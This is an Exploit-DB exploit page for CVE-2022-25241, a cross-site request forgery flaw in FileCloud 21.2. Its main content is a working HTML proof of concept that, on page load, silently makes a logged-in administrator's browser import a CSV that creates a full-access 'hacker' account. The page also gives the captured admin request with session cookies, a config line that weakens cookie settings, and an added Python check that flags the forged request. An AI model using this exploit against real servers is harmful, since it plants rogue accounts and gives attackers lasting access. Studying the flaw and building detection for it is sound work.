FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

EDB-ID: 50774
Platform: PHP
Date: 2022-02-21


# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)
# Tested on:
#  OS: Ubuntu 18.04.6 LTS (Docker)
#  Apache: 2.4.52
#  FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if cookies have SameSite set to None (SameSite=None).
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https for the target URL (when cookies are set with SameSite=None, the Secure attribute must also be set, so they are only sent over HTTPS).

# PoC (HTML)
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">

<script>
function init(){
  // Build the same multipart body the admin UI sends for a CSV user import.
  const myFormData = new FormData();
  let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
  myFormData.append("uploadFormElement", fileContent, "user.csv");
  // credentials: "include" makes the browser attach the victim's admin session cookies (only possible with SameSite=None).
  fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241

Creates the user "hacker" with password Password1 via CSV file upload.
</body>
</html>
# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--
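To show how a proxy or the server itself would flag this capture, here is an added Python check (written for this page, not FileCloud code) that applies the two controls a cross-site fetch() cannot satisfy, an X-XSRF-TOKEN request header matching the cookie and an Origin matching the Host, to a constructed copy of the request above. The Origin header values and the third-party.example hostname are assumptions; the capture above does not show an Origin line.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed samples (not from the advisory): the cross-site request from the
# PoC above, with the Origin header a browser adds to a cross-origin fetch(),
# and a same-origin submission that echoes the token cookie as a request header.
REQUEST_LINE = "POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1\r\n"
COMMON = (
    "Host: 192.168.159.129:8443\r\n"
    "Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW\r\n"
)
CROSS_SITE = REQUEST_LINE + "Origin: https://third-party.example\r\n" + COMMON + "\r\n"
SAME_ORIGIN = (REQUEST_LINE + "Origin: https://192.168.159.129:8443\r\n"
               + "X-XSRF-TOKEN: rhedxvo0gullbvzkgwwv\r\n" + COMMON + "\r\n")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict)."""
    head = raw.partition("\r\n\r\n")[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def is_admin_import(path):
    """True for the user-import endpoint used by the PoC (/admin/?op=import)."""
    return path.startswith("/admin/") and parse_qs(urlsplit(path).query).get("op") == ["import"]

def csrf_findings(raw):
    """Return the CSRF checks a state-changing request fails; an empty list means it passes."""
    method, _path, headers = parse_request(raw)
    if method.upper() not in ("POST", "PUT", "DELETE"):
        return []  # safe methods are not subject to the checks
    cookies = dict(p.strip().split("=", 1) for p in headers.get("cookie", "").split(";") if "=" in p)
    findings = []
    # Double-submit check: a cross-site fetch() can send the X-XSRF-TOKEN cookie
    # along with the request, but cannot read it to copy it into a header.
    cookie_token = cookies.get("X-XSRF-TOKEN")
    if cookie_token and headers.get("x-xsrf-token") != cookie_token:
        findings.append("X-XSRF-TOKEN header missing or does not match cookie")
    # Origin check: the browser sets Origin on cross-origin POSTs; it must match Host.
    origin, host = headers.get("origin"), headers.get("host", "")
    if origin is None:
        findings.append("Origin header absent on state-changing request")
    elif urlsplit(origin).netloc != host:
        findings.append(f"Origin {origin} does not match Host {host}")
    return findings
```

Running `csrf_findings(CROSS_SITE)` reports both failures for the PoC request, while `csrf_findings(SAME_ORIGIN)` returns an empty list; either check alone would have blocked the import without relying on the SameSite cookie setting.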
# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES